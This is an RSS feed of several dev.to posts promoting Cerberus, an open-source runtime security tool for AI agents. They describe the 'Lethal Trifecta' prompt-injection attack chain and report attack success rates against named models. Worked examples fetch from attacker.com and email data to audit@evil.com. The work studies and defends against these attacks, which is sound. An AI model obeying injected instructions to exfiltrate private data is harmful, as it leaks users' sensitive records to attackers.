<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Dre</title>
    <description>The latest articles on DEV Community by Dre (@darklazaruswalks).</description>
    <link>https://dev.to/darklazaruswalks</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3802468%2Fb8a02292-4a0e-41ae-a1e1-a612928d1091.png</url>
      <title>DEV Community: Dre</title>
      <link>https://dev.to/darklazaruswalks</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/darklazaruswalks"/>
    <language>en</language>
    <item>
      <title>We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Fri, 13 Mar 2026 04:14:19 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/we-tested-agentic-ai-against-525-real-attacks-heres-what-we-found-13e2</link>
      <guid>https://dev.to/darklazaruswalks/we-tested-agentic-ai-against-525-real-attacks-heres-what-we-found-13e2</guid>
      <description>&lt;p&gt;We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.&lt;/p&gt;

&lt;p&gt;We ran the numbers. The threat is real.&lt;/p&gt;

&lt;p&gt;For the past several months, we've been building and validating Cerberus — an open-source runtime security harness for agentic AI systems. We designed it around a specific threat model we call the Lethal Trifecta: the simultaneous convergence, within a single AI execution turn, of privileged data access, untrusted content injection, and an outbound exfiltration path.&lt;/p&gt;

&lt;p&gt;We just finished our first formal validation run. N=525 attack trials across three major AI providers. Here is what the data shows.&lt;/p&gt;

&lt;p&gt;Attack Success Rates (full injection compliance — agent fully redirected to attacker's address):&lt;br&gt;
• GPT-4o-mini: 90.3% [95% CI: 84.8%–93.9%] — Causation Score: 0.811&lt;br&gt;
• Gemini 2.5 Flash: 82.4% [95% CI: 75.9%–87.5%] — Causation Score: 0.702&lt;br&gt;
• Claude Sonnet: 6.7% [95% CI: 3.8%–11.5%] — Causation Score: 0.207&lt;/p&gt;

&lt;p&gt;Control group: 0/30 exfiltrations across all providers (clean baseline). Fisher's exact test: OpenAI p&amp;lt;0.0001, Google p&amp;lt;0.0001 — both statistically significant.&lt;/p&gt;

&lt;p&gt;"This is not a theoretical vulnerability. At a 90% success rate, the Lethal Trifecta is a reliable attack primitive against current production AI systems."&lt;/p&gt;

&lt;p&gt;What is the Lethal Trifecta — and why does it matter in supply chain and finance?&lt;/p&gt;

&lt;p&gt;The attack chain requires three conditions to align within a single execution turn:&lt;/p&gt;

&lt;p&gt;• Privileged data access — the agent can see sensitive operational or financial data&lt;br&gt;
• Untrusted content injection — the agent is processing external input: a vendor document, an invoice, a client email, a compliance filing&lt;br&gt;
• An outbound exfiltration path — the agent has the authority to take downstream action&lt;/p&gt;

&lt;p&gt;In supply chain environments, AI agents orchestrating procurement workflows read vendor submissions, cross-reference inventory systems, and trigger purchase orders. In financial services, agents summarize client portfolios, process compliance documents, and triage transactions. Both architectures deliver all three trifecta conditions by design.&lt;/p&gt;

&lt;p&gt;This is not a niche edge case. It is the default configuration of agentic AI in both industries — and our data shows that two of the three major model providers are vulnerable to it at rates above 80%.&lt;/p&gt;

&lt;p&gt;What Cerberus detected — and where the gaps are&lt;/p&gt;

&lt;p&gt;Cerberus operates in three detection layers. The validation ran in observe-only mode — agents behaved exactly as they normally would, and Cerberus recorded what it saw without intervening.&lt;/p&gt;

&lt;p&gt;Detection Layer Results (N=525):&lt;br&gt;
• L1 — Data Source Monitoring: 100% across all providers [97.9%, 100%]&lt;br&gt;
• L2 — Token Provenance Tracking: 100% across all providers [97.9%, 100%]&lt;br&gt;
• L3 — Outbound Intent Detection: 13.7% (OpenAI) / 1.1% (Anthropic) / 65.7% (Google)&lt;/p&gt;

&lt;p&gt;Overall detection rate: 28.5% [24.7%, 32.6%]. False positive rate: 0.0% [0.0%, 11.4%] — zero false triggers across 30 clean control runs.&lt;/p&gt;

&lt;p&gt;Per-Category Detection (all providers combined):&lt;br&gt;
• Direct Injection: 37.8% [28.5%, 48.1%]&lt;br&gt;
• Encoded/Obfuscated: 37.5% [27.2%, 49.0%]&lt;br&gt;
• Multi-turn: 33.3% [22.9%, 45.6%]&lt;br&gt;
• Multilingual: 33.3% [22.9%, 45.6%]&lt;br&gt;
• Advanced Technique: 20.0% [14.1%, 27.5%]&lt;br&gt;
• Social Engineering: 15.3% [8.8%, 25.3%]&lt;/p&gt;

&lt;p&gt;The L3 detection gap is a known limitation and the active development focus. L1 and L2 coverage is production-ready. L3 is where the adversarial arms race is happening.&lt;/p&gt;

&lt;p&gt;Zero performance overhead&lt;/p&gt;

&lt;p&gt;• p50: 52μs per session&lt;br&gt;
• p99: 0.23ms per session&lt;br&gt;
• Overhead: 0.01% of typical LLM latency (~2s)&lt;/p&gt;

&lt;p&gt;Against a typical LLM response time of ~2 seconds, Cerberus adds 0.01% overhead at p99. There is no meaningful performance argument against deploying it.&lt;/p&gt;

&lt;p&gt;What this means if you're running AI in supply chain or financial services&lt;/p&gt;

&lt;p&gt;If your agentic AI deployment uses GPT-4o-mini or Gemini and processes external documents — vendor submissions, invoices, client communications, compliance filings — the Lethal Trifecta succeeds against it at a rate above 80%.&lt;/p&gt;

&lt;p&gt;The question is not whether this attack is theoretically possible. The question is whether you have a runtime layer that can detect when all three trifecta conditions are active in a single execution turn. Most deployments today do not.&lt;/p&gt;

&lt;p&gt;Cerberus is open source. L1 and L2 detection are production-ready. L3 is under active development with full transparency on where the gaps are. That's the honest state of the tooling — and it's already more runtime visibility than any comparable open-source option provides today.&lt;/p&gt;




&lt;p&gt;🔗 github.com/odinforge/cerberus&lt;br&gt;
📦 npm: @cerberus-ai/core (signed provenance)&lt;br&gt;
🧪 demo.cerberus.sixsenseenterprise.com&lt;br&gt;
🌐 sixsenseenterprise.com&lt;/p&gt;

&lt;h1&gt;
  
  
  AISecurity #AgenticAI #SupplyChain #FinancialServices #CyberSecurity #RuntimeSecurity #PromptInjection #OpenSource #Cerberus #SixSense #LLMSecurity #RedTeam
&lt;/h1&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>supply</category>
      <category>cerberus</category>
    </item>
    <item>
      <title>We Open-Sourced Cerberus — Runtime Security for Agentic AI</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Tue, 10 Mar 2026 03:39:08 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/we-open-sourced-cerberus-runtime-security-for-agentic-ai-5glk</link>
      <guid>https://dev.to/darklazaruswalks/we-open-sourced-cerberus-runtime-security-for-agentic-ai-5glk</guid>
      <description>&lt;p&gt;I’ve been following the [un]prompted conference agenda this week — one of the most practitioner-focused AI security events out there. Two things jumped out at me.&lt;br&gt;
Stripe has a talk called “Breaking the Lethal Trifecta.” Google’s talk describes the same problem as the “Perfect Storm” — sensitive data, untrusted content, external execution, all in the same execution turn.&lt;br&gt;
I’ve been building a tool that catches exactly this. Seeing it on the agenda confirmed we were working on the right problem. So today we’re open-sourcing Cerberus.&lt;br&gt;
What is the Lethal Trifecta?&lt;br&gt;
Three conditions that make agentic AI exploitable in a single execution turn:&lt;br&gt;
    1.  Privileged data access — the agent can read secrets, configs, or sensitive context&lt;br&gt;
    2.  Untrusted content injection — an adversarial payload reaches the model’s input&lt;br&gt;
    3.  Outbound exfiltration path — the agent can write to an external destination&lt;br&gt;
When all three are present simultaneously, a single injected sentence can exfiltrate secrets, poison memory for future sessions, or pivot across tool calls — no human in the loop.&lt;br&gt;
Existing tools check each leg in isolation. Nobody was correlating all three in real time. That’s the gap Cerberus closes.&lt;br&gt;
How Cerberus Works&lt;br&gt;
Cerberus wraps your LLM calls and monitors each execution turn as a complete unit — inputs, tool calls, outputs, and memory state — not individual signals.&lt;br&gt;
Four detection layers:&lt;br&gt;
    ∙ L1 — Pattern matching (fast, low false-positive rate)&lt;br&gt;
    ∙ L2 — Semantic analysis (catches obfuscated payloads)&lt;br&gt;
    ∙ L3 — Behavioral heuristics (unusual tool call sequences)&lt;br&gt;
    ∙ L4 — Correlation engine (are all three Trifecta legs present?)&lt;br&gt;
Plus a SQLite-backed memory contamination graph for cross-session taint tracking.&lt;br&gt;
The Numbers&lt;br&gt;
    ∙ 326 tests, 99.7% coverage&lt;br&gt;
    ∙ 21-payload attack harness across 5 attack categories&lt;br&gt;
    ∙ 100% attack detection validated before shipping any detection layer&lt;br&gt;
    ∙ Multi-model validation against Claude, GPT-4o, and Gemini in progress&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>llm</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I built a live interactive attack demo — watch real prompt injection happen and get blocked in real time</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Thu, 05 Mar 2026 11:46:35 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/i-built-a-live-interactive-attack-demo-watch-real-prompt-injection-happen-and-get-blocked-in-real-47n1</link>
      <guid>https://dev.to/darklazaruswalks/i-built-a-live-interactive-attack-demo-watch-real-prompt-injection-happen-and-get-blocked-in-real-47n1</guid>
      <description>&lt;p&gt;If you've been following Cerberus, the open-source agentic AI security layer I've been building, here's something new: a live interactive demo running on a real server with real Grafana metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;→ &lt;a href="http://demo.cerberus.sixsenseenterprise.com" rel="noopener noreferrer"&gt;demo.cerberus.sixsenseenterprise.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What it does
&lt;/h2&gt;

&lt;p&gt;Pick a scenario. Hit Run. Watch step cards populate as the attack executes. Watch the Grafana panel spike. Everything is real — real Cerberus &lt;code&gt;guard()&lt;/code&gt; middleware, real OpenTelemetry spans, real Prometheus scraping, real Grafana rendering.&lt;/p&gt;

&lt;h2&gt;
  
  
  The scenarios
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Steps&lt;/th&gt;
&lt;th&gt;Expected outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Clean Run (Control)&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Passes — score stays 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Exfiltration&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Logged — score 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prompt Injection&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Logged — score 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full Lethal Trifecta&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encoded Injection (Base64)&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Social Engineering&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise APT Simulation&lt;/td&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;BLOCKED at step 19&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  The Enterprise APT scenario is the interesting one
&lt;/h2&gt;

&lt;p&gt;19 steps. Twelve legitimate internal reads (HR, finance, CRM, payroll, contracts, audit logs, secrets vault). One clean external fetch (vendor portal). One injection delivery disguised as a "GDPR regulatory update" from &lt;code&gt;compliance-verify.net&lt;/code&gt;. Two authorized sends to &lt;code&gt;acme.com&lt;/code&gt; — &lt;strong&gt;these pass&lt;/strong&gt;. One attempted exfiltration to &lt;code&gt;data-audit@compliance-verify.net&lt;/code&gt; — &lt;strong&gt;blocked&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;authorizedDestinations&lt;/code&gt; config is key. Cerberus tracks what's authorized in context. Legitimate sends don't get blocked. Only the attacker's destination does.&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
typescript
const guarded = guard(executors, {
  threshold: 3,
  alertMode: 'interrupt',
  opentelemetry: true,
  authorizedDestinations: ['acme.com', 'deloitte.com'],
  // ...
}, outboundTools);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>ai</category>
      <category>opensource</category>
      <category>security</category>
      <category>showdev</category>
    </item>
    <item>
      <title>Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Wed, 04 Mar 2026 21:44:28 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/zero-code-change-ai-security-cerberus-now-runs-as-an-http-proxy-4o4c</link>
      <guid>https://dev.to/darklazaruswalks/zero-code-change-ai-security-cerberus-now-runs-as-an-http-proxy-4o4c</guid>
      <description>&lt;p&gt;Most security tooling asks you to change your agent's code. Wrap this, extend that, swap your tool executor. If you're deep in a LangChain or OpenAI Agents setup that's already running in prod, that's friction.&lt;/p&gt;

&lt;p&gt;New in Cerberus: proxy/gateway mode. Same detection, zero changes to your agent.&lt;/p&gt;

&lt;p&gt;How it works&lt;/p&gt;

&lt;p&gt;Instead of wrapping your executors with guard(), you spin up a Cerberus proxy and route your agent's tool calls through it:&lt;/p&gt;

&lt;p&gt;import { createProxy } from '@cerberus-ai/core';&lt;/p&gt;

&lt;p&gt;const proxy = createProxy({&lt;br&gt;
  port: 4000,&lt;br&gt;
  cerberus: { alertMode: 'interrupt', threshold: 3 },&lt;br&gt;
  tools: {&lt;br&gt;
    readCustomerData: {&lt;br&gt;
      target: '&lt;a href="http://localhost:3001/readCustomerData" rel="noopener noreferrer"&gt;http://localhost:3001/readCustomerData&lt;/a&gt;',&lt;br&gt;
      trustLevel: 'trusted',&lt;br&gt;
    },&lt;br&gt;
    fetchWebpage: {&lt;br&gt;
      target: '&lt;a href="http://localhost:3001/fetchWebpage" rel="noopener noreferrer"&gt;http://localhost:3001/fetchWebpage&lt;/a&gt;',&lt;br&gt;
      trustLevel: 'untrusted',&lt;br&gt;
    },&lt;br&gt;
    sendEmail: {&lt;br&gt;
      target: '&lt;a href="http://localhost:3001/sendEmail" rel="noopener noreferrer"&gt;http://localhost:3001/sendEmail&lt;/a&gt;',&lt;br&gt;
      outbound: true,&lt;br&gt;
    },&lt;br&gt;
  },&lt;br&gt;
});&lt;/p&gt;

&lt;p&gt;await proxy.listen(); // port 4000&lt;br&gt;
Your agent calls POST &lt;a href="http://localhost:4000/tool/sendEmail" rel="noopener noreferrer"&gt;http://localhost:4000/tool/sendEmail&lt;/a&gt; with { "args": {...} } instead of calling the tool server directly. That's the only change.&lt;/p&gt;

&lt;p&gt;What the proxy returns&lt;/p&gt;

&lt;p&gt;Allowed call:&lt;/p&gt;

&lt;p&gt;200 { "result": "Email sent to &lt;a href="mailto:user@company.com"&gt;user@company.com&lt;/a&gt;" }&lt;br&gt;
Lethal Trifecta detected (L1 + L2 + L3 fires):&lt;/p&gt;

&lt;p&gt;403 { "blocked": true, "message": "[Cerberus] Tool call blocked — risk score 3/4" }&lt;br&gt;
Plus X-Cerberus-Blocked: true header.&lt;/p&gt;

&lt;p&gt;The thing that makes this work: session state&lt;/p&gt;

&lt;p&gt;The Lethal Trifecta attack pattern isn't a single call — it's a sequence. Turn 1: agent reads private customer data (L1). Turn 2: agent fetches an attacker-controlled page that contains an injection (L2). Turn 3: agent sends an email to an external address with that data in the body (L3). Score hits 3/4. Blocked.&lt;/p&gt;

&lt;p&gt;In proxy mode, each agent run sends a X-Cerberus-Session header. The proxy maintains independent detection state per session ID, so cumulative scoring works across multiple HTTP requests from the same run. The attack pattern is detected whether you're using guard() inline or routing through the proxy.&lt;/p&gt;

&lt;p&gt;curl -X POST &lt;a href="http://localhost:4000/tool/readCustomerData" rel="noopener noreferrer"&gt;http://localhost:4000/tool/readCustomerData&lt;/a&gt; \&lt;br&gt;
  -H "X-Cerberus-Session: run-abc123" \&lt;br&gt;
  -H "Content-Type: application/json" \&lt;br&gt;
  -d '{"args": {}}'&lt;/p&gt;

&lt;h1&gt;
  
  
  200 — score 1/4
&lt;/h1&gt;

&lt;p&gt;curl -X POST &lt;a href="http://localhost:4000/tool/fetchWebpage" rel="noopener noreferrer"&gt;http://localhost:4000/tool/fetchWebpage&lt;/a&gt; \&lt;br&gt;
  -H "X-Cerberus-Session: run-abc123" \&lt;br&gt;
  -d '{"args": {"url": "&lt;a href="https://attacker.com/payload%22%7D%7D" rel="noopener noreferrer"&gt;https://attacker.com/payload"}}&lt;/a&gt;'&lt;/p&gt;

&lt;h1&gt;
  
  
  200 — score 2/4
&lt;/h1&gt;

&lt;p&gt;curl -X POST &lt;a href="http://localhost:4000/tool/sendEmail" rel="noopener noreferrer"&gt;http://localhost:4000/tool/sendEmail&lt;/a&gt; \&lt;br&gt;
  -H "X-Cerberus-Session: run-abc123" \&lt;br&gt;
  -d '{"args": {"to": "&lt;a href="mailto:audit@evil.com"&gt;audit@evil.com&lt;/a&gt;", "body": ""}}'&lt;/p&gt;

&lt;h1&gt;
  
  
  403 — score 3/4 — BLOCKED
&lt;/h1&gt;

&lt;p&gt;Under the hood&lt;/p&gt;

&lt;p&gt;Pure node:http — zero new dependencies&lt;br&gt;
GET /health → { "status": "ok", "sessions": N } for monitoring&lt;br&gt;
Sessions auto-expire after 30 minutes of inactivity&lt;br&gt;
Supports HTTP upstream targets or local handlers (useful for testing)&lt;br&gt;
733 tests, 98%+ coverage&lt;br&gt;
The proxy joins guard() (inline wrapping) and the framework adapters (LangChain, Vercel AI, OpenAI Agents) as a third integration path. Pick the one that fits where you are.&lt;/p&gt;

&lt;p&gt;Repo: github.com/Odingard/cerberus&lt;br&gt;
npm: npm install @cerberus-ai/core&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>opensource</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>I ran 765 controlled experiments to prove AI agents are leaking your data — and built the tool that catches it</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Wed, 04 Mar 2026 06:27:47 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/i-ran-765-controlled-experiments-to-prove-ai-agents-are-leaking-your-data-and-built-the-tool-that-1pl2</link>
      <guid>https://dev.to/darklazaruswalks/i-ran-765-controlled-experiments-to-prove-ai-agents-are-leaking-your-data-and-built-the-tool-that-1pl2</guid>
      <description>&lt;p&gt;Every AI agent that can read private data, fetch external content, and send &lt;br&gt;
outbound messages is one injected instruction away from exfiltrating everything &lt;br&gt;
it knows.&lt;/p&gt;

&lt;p&gt;This isn't theoretical. Here's the attack in three tool calls:&lt;/p&gt;

&lt;p&gt;Turn 0:  readPrivateData()         → 5 customer records loaded (SSNs, emails, phones)&lt;br&gt;
fetchExternalContent(url)  → attacker's webpage, payload embedded in HTML&lt;br&gt;
Turn 1:  sendOutboundReport()      → all PII sent to attacker's address&lt;br&gt;
Turn 2:  "Report sent successfully!"&lt;/p&gt;

&lt;p&gt;Total time: ~12 seconds. Cost: $0.001. No exploits. No credentials. Just a &lt;br&gt;
fetched webpage and a compliant model.&lt;/p&gt;

&lt;h2&gt;
  
  
  We measured it. Rigorously.
&lt;/h2&gt;

&lt;p&gt;30 injection payloads across 6 categories — direct injection, encoded/obfuscated &lt;br&gt;
(Base64, ROT13, hex, Unicode), social engineering (CEO fraud, IT impersonation, &lt;br&gt;
legal threats), multi-turn (persistent rules, delayed triggers, context poisoning), &lt;br&gt;
multilingual (Spanish, Mandarin, Arabic, Russian), and advanced techniques.&lt;/p&gt;

&lt;p&gt;Tested against three major LLM providers. N=285 total runs with Wilson 95% &lt;br&gt;
confidence intervals:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider&lt;/th&gt;
&lt;th&gt;Attack Success&lt;/th&gt;
&lt;th&gt;95% CI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GPT-4o-mini&lt;/td&gt;
&lt;td&gt;93.3%&lt;/td&gt;
&lt;td&gt;[86.2%, 96.9%]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gemini 2.5 Flash&lt;/td&gt;
&lt;td&gt;92.2%&lt;/td&gt;
&lt;td&gt;[84.8%, 96.2%]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Sonnet&lt;/td&gt;
&lt;td&gt;13.3%&lt;/td&gt;
&lt;td&gt;[7.8%, 21.9%]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two of the three most widely deployed AI providers are fully exploitable today.&lt;/p&gt;

&lt;p&gt;Claude resists — but its 7.8% CI floor is not zero, and not acceptable for &lt;br&gt;
enterprise PII. Its resistance reflects training against known payload patterns, &lt;br&gt;
not elimination of the underlying architectural condition.&lt;/p&gt;

&lt;h2&gt;
  
  
  The architectural condition is what matters
&lt;/h2&gt;

&lt;p&gt;I call it the &lt;strong&gt;Lethal Trifecta&lt;/strong&gt;. Any agent that can:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Access privileged data&lt;/li&gt;
&lt;li&gt;Process untrusted external content
&lt;/li&gt;
&lt;li&gt;Take outbound actions&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;...is exploitable. Not because of a bug. Because of what makes it useful.&lt;/p&gt;

&lt;h2&gt;
  
  
  We also built the defense. And proved it works.
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Cerberus&lt;/strong&gt; is a runtime security platform that wraps your tool executors — &lt;br&gt;
one function call — and detects this attack pattern in real time.&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
typescript
import { guard } from '@cerberus-ai/core';

const { executors: secured } = guard(
  { readDatabase, fetchUrl, sendEmail },
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted' },
      { toolName: 'fetchUrl', trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'] // outbound tools Cerberus monitors
);

// Use secured.readDatabase(), secured.fetchUrl(), secured.sendEmail()
// Cerberus intercepts transparently. No framework changes required.

We ran the same 30-payload suite a second time with Cerberus in observe-only
mode (N=480 runs):

0.0% false positive rate [0.0%, 11.4%] — zero false alerts on 30 clean sessions
100% accuracy on L1 and L2 — every privileged data read and untrusted content fetch tagged, deterministically
L3 catches every confirmed exfiltration — fires when PII actually flows to an unauthorized destination, not before
No prior prompt injection study has paired attack measurement with defensive
validation in the same experimental framework. We didn't want to just claim
detection — we wanted to prove it with the same rigor we used to prove the attack.

What's inside
Four detection layers sharing one correlation engine:

L1 — Tags every tool call by data trust level at access time. Detects secrets (AWS keys, JWTs, API tokens) in tool results.
L2 — Labels context tokens by origin before the LLM call. Detects injection patterns, encoding/obfuscation, and MCP tool poisoning.
L3 — Catches PII flowing to unauthorized destinations. Classifies suspicious domains (disposable emails, webhook services, IP addresses).
L4 — Tracks taint propagation through persistent memory across sessions. The first deployable defense against the MINJA (NeurIPS 2025) memory contamination attack class.
A correlation engine builds a 4-bit risk vector per turn, scores it 0-4, and
interrupts tool calls that cross the threshold.

Get it

npm install @cerberus-ai/core
MIT licensed. 718 tests at 98%+ coverage. Works with LangChain, Vercel AI SDK,
and OpenAI Agents SDK out of the box.



&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/Odingard" rel="noopener noreferrer"&gt;
        Odingard
      &lt;/a&gt; / &lt;a href="https://github.com/Odingard/cerberus" rel="noopener noreferrer"&gt;
        cerberus
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      Agentic AI runtime security — detects and interrupts prompt injection, data exfiltration, and memory contamination attacks in real-time.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div&gt;
&lt;a rel="noopener noreferrer" href="https://github.com/Odingard/cerberus/docs/cerberus-banner.svg"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2FOdingard%2Fcerberus%2Fdocs%2Fcerberus-banner.svg" alt="Cerberus — Agentic AI Runtime Security" width="100%"&gt;&lt;/a&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;Cerberus&lt;/h1&gt;
&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Runtime Security For AI Agent Tool Execution&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Odingard/cerberus/actions/workflows/ci.yml" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/Odingard/cerberus/actions/workflows/ci.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Odingard/cerberus/actions/workflows/release.yml" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/Odingard/cerberus/actions/workflows/release.yml/badge.svg" alt="Release"&gt;&lt;/a&gt;
&lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/77011288f45dc148805434a853dfda66f050ad07dba7b5c89a3f0bbf51729ef1/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f4063657262657275732d61692f636f72652e737667" alt="npm version"&gt;&lt;/a&gt;
&lt;a href="https://opensource.org/licenses/MIT" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/fdf2982b9f5d7489dcf44570e714e3a15fce6253e0cc6b5aa61a075aac2ff71b/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c6963656e73652d4d49542d79656c6c6f772e737667" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/ce6c79e94ddef24ead6e856d73fca57536a9aa30b4ae0012b2de6809044b4fbf/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f646d2f4063657262657275732d61692f636f72652e737667" alt="npm downloads"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/cerberus-ai/" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/5bb547770ad694cb04cbe72536008202bdec02fecb4f29dd722fc4fed1c9b805/68747470733a2f2f696d672e736869656c64732e696f2f707970692f762f63657262657275732d61692e737667" alt="PyPI version"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Embeddable runtime enforcement for AI agents. Cerberus correlates privileged data access, untrusted content ingestion, and outbound behavior at the tool-call level, then interrupts guarded outbound actions before they execute.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://cerberus.sixsenseenterprise.com" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;Docs&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;npm&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://pypi.org/project/cerberus-ai/" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;PyPI&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://github.com/Odingard/cerberus/mailto:enterprise@sixsenseenterprise.com" rel="noopener noreferrer"&gt;&lt;strong&gt;Enterprise&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;


&lt;/div&gt;
&lt;br&gt;


&lt;div class="markdown-alert markdown-alert-note"&gt;
&lt;p class="markdown-alert-title"&gt;Note&lt;/p&gt;
&lt;p&gt;Cerberus is the agentic AI security layer of &lt;a href="https://www.sixsenseenterprise.com" rel="nofollow noopener noreferrer"&gt;Six Sense Enterprise Services&lt;/a&gt;. The core detection library (&lt;code&gt;@cerberus-ai/core&lt;/code&gt;) is MIT licensed and free. The &lt;a href="https://github.com/Odingard/cerberus#-enterprise--self-hosted" rel="noopener noreferrer"&gt;Enterprise edition&lt;/a&gt; adds a self-hosted Gateway, Grafana monitoring stack, and production deployment tooling for teams running AI agents in production.&lt;/p&gt;
&lt;/div&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Table of Contents&lt;/h2&gt;
&lt;/div&gt;

&lt;ul&gt;
